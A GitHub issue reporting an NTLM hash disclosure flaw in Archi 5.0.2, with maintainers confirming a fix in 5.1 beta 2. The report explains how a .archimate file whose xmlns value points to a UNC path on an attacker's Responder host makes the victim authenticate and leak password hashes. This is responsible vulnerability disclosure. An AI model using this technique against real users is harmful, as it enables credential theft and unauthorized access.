-
-
Notifications
You must be signed in to change notification settings - Fork 269
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
NTLM Hash Disclosure (v5.0.2) #946
Comments
Thanks for the report. This is under investigation. |
Phillipus
added a commit
that referenced
this issue
Jul 14, 2023
This will be addressed in the next version of Archi. Thanks. |
Fixed in Archi 5.1 beta 2. |
Thanks for the quick response! 💪 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Version of Archi
5.0.2
Description
When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest account, the host will try to authenticate on the share using the current user's session.
Impact
A malicious user can capture NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.
Technical fix
Do not allow the application’s functionality to resolve or load UNC paths.
Technical Details
“archimate” project are saved as XML file using the extension .archimate . The below example is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is place on the diagram “Default View” (link by the ID
e79145c...).
The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and in case a UNC is provided, the host will try to access the share drive and if need be, try to authenticate.
In the following example, the attacker is running the Responder tool ( Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \172.16.227.1\share\archimate.
Whenever the victim is opening the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.
As seen in the output above, the NTLM hash is leaked and could be used to crack the user's password.
The text was updated successfully, but these errors were encountered: